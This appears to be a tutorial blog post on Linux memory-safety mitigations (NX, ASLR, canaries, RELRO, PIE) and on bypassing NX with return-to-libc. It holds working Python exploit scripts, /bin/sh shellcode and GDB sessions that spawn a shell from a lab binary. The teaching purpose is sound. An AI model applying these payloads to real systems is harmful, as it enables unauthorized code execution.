2. Linux Exploit Countermeasures and Bypasses (2)
To make exploitation more challenging, several mitigations have been developed and widely implemented. Let’s dive into some of the most popular ones and understand how they work:
1. DEP/NX (Data Execution Prevention / No eXecute):
Data Execution Prevention (DEP), also called No eXecute (NX), is a security feature that prevents code from running in memory regions that are meant to hold data, such as the stack or heap. This blocks classic buffer overflow attacks that inject shellcode into those regions. It relies on the NX bit, a hardware mechanism that marks individual memory pages as non-executable. AMD introduced the NX bit, and Intel later adopted it under the name Execute Disable (XD). Operating system support became widespread starting with Windows XP SP2 and various Linux distributions, and most modern processors provide the feature.
How it Works: With DEP/NX enforced, a memory page is normally mapped as either writable or executable, but not both (a policy often called W^X). Even if an attacker injects malicious code into a writable region, the CPU refuses to execute it.
Example: Trying to execute shellcode from the stack with NX enabled will cause the program to crash, preventing exploitation.
2. ASLR (Address Space Layout Randomization):
Address Space Layout Randomization (ASLR) introduces randomness by shuffling the memory addresses of important regions, such as the stack, heap, and libraries, each time the program runs. This unpredictability makes it far harder for attackers to predict where their payload or code will end up.
How it Works: ASLR assigns a different memory address to regions of a process each time it’s loaded. This means an attacker can’t rely on specific memory addresses staying the same across runs.
Example: If an attacker tries to jump to a specific libc function by guessing its address, ASLR will frustrate these efforts by randomizing the location on each execution.
ASLR Configuration in Linux:
You can check and configure ASLR in Linux through the /proc/sys/kernel/randomize_va_space file. This file controls the level of randomization applied:
- 0: No randomization (static memory layout).
- 1: Conservative randomization (randomizes the stack, the mmap base, shared libraries, and the vDSO).
- 2: Full randomization (additionally randomizes the heap managed by brk()).
To enable full randomization, use:
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
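If you want to check the setting from a script rather than the shell, a minimal Python sketch could look like the one below. The function names and the label strings are my own for illustration; only the procfs path comes from the text above.

```python
from pathlib import Path

# Short labels for each value of randomize_va_space (wording is illustrative).
ASLR_LEVELS = {
    0: "no randomization",
    1: "conservative randomization",
    2: "full randomization",
}

def describe_aslr(raw: str) -> str:
    """Turn the raw file contents (for example '2\n') into a readable label."""
    level = int(raw.strip())
    return ASLR_LEVELS.get(level, f"unknown level {level}")

def current_aslr(path: str = "/proc/sys/kernel/randomize_va_space") -> str:
    """Read the current setting from procfs (Linux only)."""
    return describe_aslr(Path(path).read_text())

# On a Linux machine: print(current_aslr())
```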
The following C program demonstrates ASLR’s effect by displaying addresses for a function, a local variable, and a dynamically allocated heap variable each time the program runs.
// gcc -m32 aslr.c -o aslr
#include <stdio.h>
#include <stdlib.h>
void print_addresses();
int main() {
    int *heap_variable = (int *)malloc(sizeof(int)); // Allocate memory on the heap
    print_addresses(); // Print function and variable addresses
    printf("Address of heap variable: %p\n", (void *)heap_variable); // Print heap address
    free(heap_variable); // Free memory
    return 0;
}
void print_addresses() {
    int local_variable;
    printf("Address of main: %p\n", (void *)main);
    printf("Address of local variable: %p\n", (void *)&local_variable);
}
Run the program multiple times with ASLR enabled (set to 2):
$ ./aslr
Address of main: 0x566451ad
Address of local variable: 0xffd29fac
Address of heap variable: 0x581761a0
$ ./aslr
Address of main: 0x566221ad
Address of local variable: 0xffbcf99c
Address of heap variable: 0x5701b1a0
$ ./aslr
Address of main: 0x566441ad
Address of local variable: 0xffb70fbc
Address of heap variable: 0x570f91a0
Notice how the addresses vary each time, making memory layout unpredictable.
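One detail worth noticing in the output above: the low 12 bits of the main and heap addresses never change. That is consistent with randomization being applied in page-sized (4 KiB) steps, so the offset inside a page survives. The short sketch below checks this against the addresses printed above; the helper name is my own.

```python
PAGE_MASK = 0xFFF  # low 12 bits = offset inside a 4 KiB page

# Addresses copied from the three runs shown above.
main_addrs = [0x566451AD, 0x566221AD, 0x566441AD]
heap_addrs = [0x581761A0, 0x5701B1A0, 0x570F91A0]

def page_offsets(addrs):
    """Return the set of in-page offsets seen across all runs."""
    return {addr & PAGE_MASK for addr in addrs}

print([hex(o) for o in page_offsets(main_addrs)])  # a single offset for main
print([hex(o) for o in page_offsets(heap_addrs)])  # a single offset for the heap
```

This matters for exploitation because a partial overwrite of only the low byte or two of a pointer can sometimes avoid the randomized bits.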
Disabling ASLR:
Setting /proc/sys/kernel/randomize_va_space to 0 disables ASLR, and addresses remain static across runs:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
$ ./aslr
Address of main: 0x565561ad
Address of local variable: 0xffffd64c
Address of heap variable: 0x5655a1a0
$ ./aslr
Address of main: 0x565561ad
Address of local variable: 0xffffd64c
Address of heap variable: 0x5655a1a0
$ ./aslr
Address of main: 0x565561ad
Address of local variable: 0xffffd64c
Address of heap variable: 0x5655a1a0
With ASLR disabled, the addresses stay constant across runs, which makes it much easier for an attacker to predict addresses and exploit memory corruption vulnerabilities.
It’s important to note that even with ASLR enabled, the offset for functions and gadgets within libc remains the same. This means that once we know the libc base address, we can determine the address of any libc function or gadget at runtime simply by adding the known offset to the base.
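As a minimal sketch of that arithmetic, the snippet below converts between a libc base, a fixed offset, and a runtime address. The base and offset values are the ones measured later in this post for this particular libc build; the function names are hypothetical.

```python
def resolve(libc_base: int, offset: int) -> int:
    """Runtime address of a symbol = load base + fixed offset inside libc."""
    return libc_base + offset

def base_from_leak(leaked_addr: int, offset: int) -> int:
    """Recover the libc base from one leaked address whose offset is known."""
    return leaked_addr - offset

LIBC_BASE = 0xF7D5F000   # base observed later in this post (ASLR disabled)
SYSTEM_OFFSET = 0x524C0  # offset of system() in this specific libc build

system_addr = resolve(LIBC_BASE, SYSTEM_OFFSET)
print(hex(system_addr))
print(hex(base_from_leak(system_addr, SYSTEM_OFFSET)))
```

The second helper is the direction an attacker typically needs under ASLR: leak one libc pointer, subtract its offset, and every other address follows.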
3. Stack Canaries
Stack canaries, also known as security cookies, defend against stack buffer overflows by placing a random value, the “canary,” on the stack near the return address. The canary acts as a sentinel: a linear overflow that reaches the return address must overwrite the canary first, and that change can be detected.
How it Works: During a function call, a random canary value is inserted between the buffer and the return address on the stack. Before returning from a function, the program checks the integrity of this canary value. If it finds that the canary has been altered, it suggests a potential buffer overflow attack, prompting the program to take defensive actions such as terminating execution or invoking additional security measures.
Types of Stack Canaries:
- Terminator Canaries: These contain common string terminators like \x00, \r, \n, and \xFF. Because string functions such as strcpy() stop copying at a terminator, an attacker cannot write the canary bytes back through such a function and still continue overwriting past it.
- Random Canaries: Generated randomly at runtime, typically drawn from /dev/urandom if available. This randomness makes it challenging for attackers to predict or forge the canary value.
- Random XOR Canaries: Combine random numbers with control data (like the frame pointer and return address) using XOR operations. A change to either the canary or the control data makes the check fail, triggering immediate termination.
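To make the check concrete, here is a toy Python simulation of a stack frame protected by a random canary. It is only a model: the frame layout, sizes, and function names are assumptions for illustration, and real canaries are inserted and checked by compiler-generated code.

```python
import os
import struct

BUF_SIZE = 16  # size of the local buffer in this toy frame

def new_frame(canary: bytes, ret_addr: int) -> bytearray:
    """Toy layout, low to high addresses: [buffer][canary][return address]."""
    return bytearray(BUF_SIZE) + bytearray(canary) + bytearray(struct.pack("<I", ret_addr))

def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Copy with no bounds check, like an unsafe strcpy() into the buffer."""
    frame[:len(data)] = data

def canary_intact(frame: bytearray, canary: bytes) -> bool:
    """The epilogue check: compare the stored canary with the reference value."""
    return bytes(frame[BUF_SIZE:BUF_SIZE + len(canary)]) == canary

canary = os.urandom(4)                 # random canary chosen at startup
frame = new_frame(canary, 0x080491D5)
unchecked_copy(frame, b"A" * 8)        # fits in the buffer
print(canary_intact(frame, canary))
unchecked_copy(frame, b"A" * 24)       # runs over the canary and return address
print(canary_intact(frame, canary))
```

The second copy reaches the return address only by trampling the canary first, which is exactly what the check detects.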
4. RELRO (Relocation Read-Only):
Relocation Read-Only (RELRO) is a security feature implemented in the GNU linker that hardens ELF (Executable and Linkable Format) binaries by making certain sections read-only once relocation has finished. It focuses on the Global Offset Table (GOT), which holds the addresses of dynamically linked functions and is a common target in binary exploitation. By making these sections read-only after relocation, RELRO mitigates techniques such as GOT overwrite attacks.
Types of RELRO There are two modes of RELRO:
- Partial RELRO:
  - This mode marks the non-Procedure Linkage Table (non-PLT) part of the GOT (.got) as read-only after relocation.
  - The PLT part of the GOT (.got.plt) remains writable, so while this mode provides some protection, GOT overwrite attacks against those entries are still possible.
  - Partial RELRO is often the default setting in many GCC-compiled binaries.
- Full RELRO:
  - In this mode, the entire GOT, including .got.plt, is made read-only after relocation.
  - This provides a higher level of security by preventing any modifications to these sections during runtime.
  - Full RELRO can increase startup time since all dynamic symbols must be resolved before execution begins.
Implementation of RELRO:
$ # For Partial RELRO:
$ gcc -o file file.c -Wl,-z,relro
$ # For Full RELRO:
$ gcc -o file file.c -Wl,-z,relro,-z,now
Full RELRO provides stronger protection against GOT overwrite attacks compared to Partial RELRO. However, it can lead to longer startup times since all symbols must be resolved before execution.
We’ll dive deeper into this concept when we explore bypass techniques.
5. PIE (Position Independent Executables)
Position Independent Executables (PIE) allow the executable itself to be loaded at a randomized address, adding another layer of unpredictability. Without PIE, ASLR still randomizes the stack, heap, and shared libraries, but the main binary is loaded at a fixed address. With PIE, the binary’s own code is randomized too, making it more challenging to predict code locations for return-oriented programming (ROP) attacks.
How it Works: PIE enables the entire binary to be relocated to different memory addresses each time it runs. This feature requires the binary to be compiled in a way that allows it to operate independently of a fixed memory location.
Example: If an attacker tries to jump to a specific function within the executable, PIE will have randomized its position, forcing them to dynamically resolve the new address.
To check which mitigations are enabled on a binary, you can use checksec from the pwntools suite:
$ pwn checksec exp2_nx
[*] '/home/kali/Desktop/Blogs/Materials/x86_exp_dev/02/exp2_nx'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
Stripped: No
From the output, we can observe:
- NX: The stack is non-executable (NX enabled), blocking code execution in writable areas.
- RELRO: Partial RELRO is enabled, providing limited protection for GOT entries.
- Stack Canary: Not found, so the binary lacks buffer overflow protection for stack frames.
- PIE: Position Independent Executable is disabled, meaning the executable loads at a fixed address.
1. Bypassing DEP/NX (Data Execution Prevention / No eXecute):
Now, let’s work on bypassing NX! We’ll attempt to execute the same shellcode from our jmp eax example.
📝 Note: Make sure ASLR is disabled before proceeding.
Compile the Binary with NX Enabled
$ gcc -m32 exp1.c -fno-stack-protector -no-pie -o exp2_nx
For this test, I’ve renamed exp1.py to exp2.py and updated it to point to our jmp eax gadget.
#!/usr/bin/python2
# exp2.py
import struct
offset = 62
libc_base = 0xf7d5f000
jmp_eax = 0x00024fe3
payload = "\x90"*10 # 10 NOPS
payload += "\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" # /bin/sh shellcode
payload += "A"*(offset-len(payload)) # padding
#payload += "BBBB" # EIP
payload += struct.pack("<I",libc_base+jmp_eax) # EIP
print(payload)
Now, let’s try to execute the exploit with NX enabled on exp2_nx:
$ ./exp2_nx $(./exp2.py)
Segmentation fault (core dumped)
Let’s examine the core dump to see what happened:
$ gdb -core core
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0xffffd5ce in ?? ()
──────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────
EAX 0xffffd5ce ◂— 0x90909090
EBX 0x41414141 ('AAAA')
ECX 0xffffd910 ◂— 0xf7d83f
EDX 0xffffd60d ◂— 0xf7d83f
EDI 0xf7ffcb60 ◂— 0
ESI 0xffffd700 —▸ 0xffffd914 ◂— 'SHELL=/usr/bin/bash'
EBP 0x41414141 ('AAAA')
ESP 0xffffd610 —▸ 0xffffd800 ◂— 6
EIP 0xffffd5ce ◂— 0x90909090
────────────────────────────[ DISASM / i386 / set emulate on ]────────────────────────────
► 0xffffd5ce nop
0xffffd5cf nop
0xffffd5d0 nop
0xffffd5d1 nop
...
🔍 Here, we can see that we successfully landed on the NOP sled, but because the shellcode is in a non-executable memory region (due to NX), it cannot be executed. 😞
This example demonstrates the effectiveness of NX by preventing code execution in non-executable memory regions. 🛡️
So, how can we bypass NX? 🤔 While we can’t execute injected shellcode directly due to the non-executable stack, we can still execute existing code within the binary or libraries. This approach is called Return-Oriented Programming (ROP).
With ROP, we construct a payload that leverages small “gadgets”—existing sequences of instructions ending in a ret—to piece together our own custom execution flow. Essentially, instead of injecting new code, we’re “reusing” code that’s already in memory to achieve our exploit goals.
In this example, let’s use a technique called Return-to-libc (ret2libc) to bypass NX.
Ret2libc is a simpler and more specific form of ROP in which the attacker calls existing functions in the C standard library (like system(), exit(), etc.), typically to spawn a shell. When the stack is non-executable, shellcode injection won’t work, but we can reuse code that’s already loaded in memory. The C library (libc) is a convenient source because it contains functions like system() and useful strings like "/bin/sh".
Here’s how ret2libc works:
- Find libc functions: We locate the system() function and the string "/bin/sh" within libc. By calling system("/bin/sh"), we can spawn a shell.
- Modify the payload: Instead of shellcode, our payload will set up the stack to call system("/bin/sh"), giving us shell access by reusing legitimate code that is already loaded.
Let’s implement this with our example exploit!
Find the system() offset within libc:
$ nm -D /usr/lib32/libc.so.6 | grep -i system
000524c0 T __libc_system@@GLIBC_PRIVATE
00171b20 T svcerr_systemerr@GLIBC_2.0
000524c0 W system@@GLIBC_2.0
For more info on nm, refer to my blog.
The offset of the system function in libc is 0x524c0. We can verify this using GDB with the pwndbg extension.
$ gdb ./exp2_nx
pwndbg> b main
Breakpoint 1 at 0x804919f
pwndbg> run
pwndbg> xinfo system
Extended information for virtual address 0xf7db14c0:
Containing mapping:
0xf7d82000 0xf7f0e000 r-xp 18c000 23000 /usr/lib32/libc.so.6
Offset information:
Mapped Area 0xf7db14c0 = 0xf7d82000 + 0x2f4c0
File (Base) 0xf7db14c0 = 0xf7d5f000 + 0x524c0
File (Segment) 0xf7db14c0 = 0xf7d82000 + 0x2f4c0
File (Disk) 0xf7db14c0 = /usr/lib32/libc.so.6 + 0x524c0
Containing ELF sections:
.text 0xf7db14c0 = 0xf7d821c0 + 0x2f300
The xinfo command shows extended information about the address of system, including details of its memory mapping.
From this output, we can see that the libc base address is 0xf7d5f000 and the offset for system is confirmed as 0x524c0. This information is crucial for constructing our exploit.
The next step is finding the offset of the string "/bin/sh".
We can use the strings utility for this:
$ strings -a -t x /usr/lib32/libc.so.6 | grep "/bin/sh"
1c9e3c /bin/sh
So the offset for string “/bin/sh” in libc is 0x1c9e3c.
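The same search can be scripted. The sketch below scans raw bytes for a needle and returns every offset where it occurs, which is roughly what strings -a -t x piped through grep did above. The function names are my own, and the libc path in the comment is simply the one used in this post. Keep in mind this yields file offsets; here they match the offset from the load base, as the GDB check that follows confirms, but that is worth verifying for each binary.

```python
def find_offsets(data: bytes, needle: bytes) -> list[int]:
    """Return every offset at which `needle` occurs in `data`."""
    offsets = []
    start = 0
    while (idx := data.find(needle, start)) != -1:
        offsets.append(idx)
        start = idx + 1
    return offsets

def find_in_file(path: str, needle: bytes) -> list[int]:
    """Read a file as raw bytes and search it for `needle`."""
    with open(path, "rb") as f:
        return find_offsets(f.read(), needle)

# Example (adjust the path for your system):
# print([hex(o) for o in find_in_file("/usr/lib32/libc.so.6", b"/bin/sh\x00")])
```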
We can also use GDB (pwndbg) for it:
pwndbg> search "/bin/sh"
Searching for byte: b'/bin/sh'
libc.so.6 0xf7f28e3c '/bin/sh'
So the offset is 0xf7f28e3c - 0xf7d5f000 = 0x1c9e3c.
To understand how function calls are made in x86 architecture and how to exploit them using the return-to-libc (ret2libc) technique, we need to break down a few concepts, particularly the call instruction and the function’s stack frame.
Function Call Mechanism
- Call Instruction: When a function is called using the call instruction, the CPU performs the following steps:
  - Pushes the return address (the address of the instruction following the call) onto the stack.
  - Transfers control to the function by jumping to its address.
- Function Arguments:
  - Arguments passed to the function are typically placed on the stack or in specific registers (depending on the calling convention).
  - For example, in the cdecl calling convention, arguments are pushed onto the stack in right-to-left order before the call instruction is executed.
For example:
call my_function
If my_function is located at address 0x08048400, the CPU will push the return address (say, 0x0804840A) onto the stack and jump to 0x08048400.
Argument Handling
For instance, if my_function expects two integer arguments, you might see something like this:
push 2 ; Push the second argument onto the stack
push 1 ; Push the first argument onto the stack
call my_function
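To visualize what the stack looks like when my_function starts executing, here is a small Python model of the three instructions above. The Stack class is purely illustrative, and the return address is the example value mentioned earlier.

```python
class Stack:
    """Minimal model of a downward-growing x86 stack; index 0 is the top (ESP)."""

    def __init__(self):
        self.words = []

    def push(self, value: int) -> None:
        # A push places the new value at the top of the stack.
        self.words.insert(0, value)

    def call(self, return_address: int) -> None:
        # `call` pushes the address of the next instruction, then jumps.
        self.push(return_address)

stack = Stack()
stack.push(2)            # second argument is pushed first (right-to-left)
stack.push(1)            # first argument is pushed last
stack.call(0x0804840A)   # return address from the example above

# From the top: return address, first argument, second argument.
print([hex(w) for w in stack.words])
```

This top-down order (return address, then arguments) is the layout a ret2libc payload has to imitate.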
Practical Example: C Program 🖥️ I’ve used the following C program to explain it more practically:
#include <stdio.h>
void two_str(char *s1, char *s2) {
    printf("%s\n",s1);
    printf("%s\n",s2);
}
int main() {
    char *str1="hello";
    char *str2="world";
    two_str(str1,str2);
}
To see how function calls work, disassemble main:
pwndbg> disass main
Dump of assembler code for function main:
0x0804919a <+0>: lea ecx,[esp+0x4]
0x0804919e <+4>: and esp,0xfffffff0
0x080491a1 <+7>: push DWORD PTR [ecx-0x4]
0x080491a4 <+10>: push ebp
0x080491a5 <+11>: mov ebp,esp
0x080491a7 <+13>: push ecx
0x080491a8 <+14>: sub esp,0x14
0x080491ab <+17>: call 0x80491e5 <__x86.get_pc_thunk.ax>
0x080491b0 <+22>: add eax,0x2e44
0x080491b5 <+27>: lea edx,[eax-0x1fec]
0x080491bb <+33>: mov DWORD PTR [ebp-0xc],edx
0x080491be <+36>: lea eax,[eax-0x1fe6]
0x080491c4 <+42>: mov DWORD PTR [ebp-0x10],eax
0x080491c7 <+45>: sub esp,0x8
0x080491ca <+48>: push DWORD PTR [ebp-0x10]
0x080491cd <+51>: push DWORD PTR [ebp-0xc]
0x080491d0 <+54>: call 0x8049166 <two_str>
0x080491d5 <+59>: add esp,0x10
0x080491d8 <+62>: mov eax,0x0
0x080491dd <+67>: mov ecx,DWORD PTR [ebp-0x4]
0x080491e0 <+70>: leave
0x080491e1 <+71>: lea esp,[ecx-0x4]
0x080491e4 <+74>: ret
At instructions +48 and +51, you can see that pointers to the strings are pushed onto the stack.
Let’s set a breakpoint at 0x080491d0 (i.e., *main+54) and run the program:
pwndbg> b *0x080491d0
Breakpoint 1 at 0x80491d0
pwndbg> run
Now, let’s examine the stack right before we call two_str:
pwndbg> x/2wx $sp
0xffffd5d0: 0x0804a008 0x0804a00e
pwndbg> x/s 0x0804a008
0x804a008: "hello"
pwndbg> x/s 0x0804a00e
0x804a00e: "world"
pwndbg> stack 2
00:0000│ esp 0xffffd5d0 —▸ 0x804a008 ◂— 'hello'
01:0004│-024 0xffffd5d4 —▸ 0x804a00e ◂— 'world'
You can see that the pointer to the string world is pushed before the pointer to the string hello, so the first argument ends up at the top of the stack.
Now, let’s continue to the function call:
pwndbg> b *0x8049166
Breakpoint 2 at 0x8049166
pwndbg> c
When we print the stack now, we see that the top of the stack points to the return address 0x080491d5 (i.e., *main+59):
pwndbg> stack 3
00:0000│ esp 0xffffd5cc —▸ 0x80491d5 (main+59) ◂— add esp, 0x10
01:0004│-028 0xffffd5d0 —▸ 0x804a008 ◂— 'hello'
02:0008│-024 0xffffd5d4 —▸ 0x804a00e ◂— 'world'
pwndbg> x/3wx $esp
0xffffd5cc: 0x080491d5 0x0804a008 0x0804a00e
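I hope it is now clear what happens on the stack when we call a function with arguments.
Ret2libc reproduces this layout by hand: the overwritten return address holds the address of system(), the next word is the return address that system() will use, and the word after that is its argument, a pointer to "/bin/sh". The following exploit builds exactly this layout: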
#!/usr/bin/python2
# exp3.py
import struct
offset = 62
libc_base = 0xf7d5f000
system = libc_base + 0x524c0
bin_sh = libc_base + 0x1c9e3c
payload = "A"*offset
payload += struct.pack("<I",system) # EIP -> system
payload += struct.pack("<I",0xdeadbeef) # return address
payload += struct.pack("<I",bin_sh) # arg -> /bin/sh
print(payload)
For clarity, I’ve used 0xdeadbeef as the return address, which is where execution lands after system("/bin/sh") returns.
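The script above targets Python 2, where strings are bytes. As a rough Python 3 sketch of the same layout (not the script used in this post), the payload can be built as a bytes object. The helper name build_ret2libc is hypothetical; the offset and addresses are the values measured above.

```python
import struct

def build_ret2libc(offset: int, func: int, ret: int, arg: int) -> bytes:
    """Layout: [padding][function address][its return address][its first argument]."""
    payload = b"A" * offset              # filler up to the saved return address
    payload += struct.pack("<I", func)   # EIP -> function to call
    payload += struct.pack("<I", ret)    # where that function returns to
    payload += struct.pack("<I", arg)    # first argument of the function
    return payload

LIBC_BASE = 0xF7D5F000
payload = build_ret2libc(
    offset=62,
    func=LIBC_BASE + 0x524C0,    # system()
    ret=0xDEADBEEF,              # placeholder return address
    arg=LIBC_BASE + 0x1C9E3C,    # "/bin/sh"
)

# In Python 3, emit raw bytes with: sys.stdout.buffer.write(payload)
print(len(payload), payload[62:].hex())
```

Using print() on a bytes object in Python 3 would output its repr rather than the raw bytes, which is why the comment points at sys.stdout.buffer.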
./exp2_nx $(./exp3.py)
$ pwd
/home/kali/Desktop/Blogs/Materials/x86_exp_dev/02
As you can see, we got a shell :)
But let’s exit from the shell and see what happens.
./exp2_nx $(./exp3.py)
$ pwd
/home/kali/Desktop/Blogs/Materials/x86_exp_dev/02
$ exit
Segmentation fault (core dumped)
As you can see, we got a segfault. Let’s examine the core dump.
$ gdb -core core
...
──────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────
EAX 0
EBX 0x41414141 ('AAAA')
ECX 0xffffd2d4 ◂— 0
EDX 0
EDI 0xf7ffcb60 ◂— 0
ESI 0xffffd6c0 —▸ 0xffffd8de ◂— 'SHELL=/usr/bin/bash'
EBP 0x41414141 ('AAAA')
ESP 0xffffd5d4 —▸ 0xf7f28e3c ◂— '/bin/sh'
EIP 0xdeadbeef
────────────────────────────[ DISASM / i386 / set emulate on ]────────────────────────────
Invalid address 0xdeadbeef
...
As you can see, we landed on an invalid address.
To land on a safe address instead, we will use the exit() function.
$ nm -D /usr/lib32/libc.so.6 | grep exit
...
0003eac0 T exit@@GLIBC_2.0
We can verify this:
pwndbg> xinfo exit
Extended information for virtual address 0xf7d9dac0:
Containing mapping:
0xf7d82000 0xf7f0e000 r-xp 18c000 23000 /usr/lib32/libc.so.6
Offset information:
Mapped Area 0xf7d9dac0 = 0xf7d82000 + 0x1bac0
File (Base) 0xf7d9dac0 = 0xf7d5f000 + 0x3eac0
File (Segment) 0xf7d9dac0 = 0xf7d82000 + 0x1bac0
File (Disk) 0xf7d9dac0 = /usr/lib32/libc.so.6 + 0x3eac0
Containing ELF sections:
.text 0xf7d9dac0 = 0xf7d821c0 + 0x1b900
Here’s our exploit to perform ret2libc:
#!/usr/bin/python2
# exp3.py
import struct
offset = 62
libc_base = 0xf7d5f000
system = libc_base + 0x524c0
bin_sh = libc_base + 0x1c9e3c
exit_func = libc_base + 0x3eac0
payload = "A"*offset
payload += struct.pack("<I",system) # EIP -> system
# payload += struct.pack("<I",0xdeadbeef) # return address
payload += struct.pack("<I",exit_func) # return address
payload += struct.pack("<I",bin_sh) # arg -> /bin/sh
print(payload)
By replacing 0xdeadbeef with the address of the exit function, we ensure the process exits gracefully instead of crashing.😊
./exp2_nx $(./exp3.py)
$ pwd
/home/kali/Desktop/Blogs/Materials/x86_exp_dev/02
$ exit
echo $?
0
In Linux, the command echo $? prints the exit status of the last executed command.
Extra Info:
What if we want the exit status to be 255?
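To set the exit status to 255 (0xFF in hexadecimal), we can add 0xff as an argument to exit() right after the pointer to the string "/bin/sh". When system() returns into exit(), exit() treats the slot holding the "/bin/sh" pointer as its own return address and the following word as its argument.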
#!/usr/bin/python2
# exp3.py
import struct
offset = 62
libc_base = 0xf7d5f000
system = libc_base + 0x524c0
bin_sh = libc_base + 0x1c9e3c
exit_func = libc_base + 0x3eac0
payload = "A"*offset
payload += struct.pack("<I",system) # EIP -> system
# payload += struct.pack("<I",0xdeadbeef) # return address
payload += struct.pack("<I",exit_func) # return address
payload += struct.pack("<I",bin_sh) # arg -> /bin/sh
payload += struct.pack("<I",0xff) # exit status
print(payload)
./exp2_nx $(./exp3.py)
bash: warning: command substitution: ignored null byte in input
$ pwd
/home/kali/Desktop/Blogs/Materials/x86_exp_dev/02
$ exit
echo $?
255
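This way, we can control the exit status directly through our payload. The bash warning appears because the packed value 0xff contains null bytes, which bash drops during command substitution. The status still comes out as 255 because the shell only sees the low 8 bits of the value passed to exit().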
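To see why one extra word is enough, it helps to look at the four payload words from the point of view of each function. The sketch below is a simplified model with a hypothetical helper, callee_view: when a function is entered through ret, the word right after its address acts as its return address and the word after that as its first argument.

```python
import struct

def callee_view(words, index):
    """How the function at words[index] sees the stack when entered via `ret`."""
    return {
        "function": words[index],
        "return_to": words[index + 1],  # what it will return to
        "arg1": words[index + 2],       # its first cdecl argument
    }

LIBC_BASE = 0xF7D5F000
chain = [
    LIBC_BASE + 0x524C0,    # system()
    LIBC_BASE + 0x3EAC0,    # exit()
    LIBC_BASE + 0x1C9E3C,   # "/bin/sh"
    0xFF,                   # exit status
]

system_view = callee_view(chain, 0)  # returns to exit(), argument is "/bin/sh"
exit_view = callee_view(chain, 1)    # argument is 0xff
packed_status = struct.pack("<I", 0xFF)

print({k: hex(v) for k, v in system_view.items()})
print({k: hex(v) for k, v in exit_view.items()})
print(packed_status)  # contains three null bytes
```

exit() never returns, so it does not matter that its "return address" slot holds the "/bin/sh" pointer.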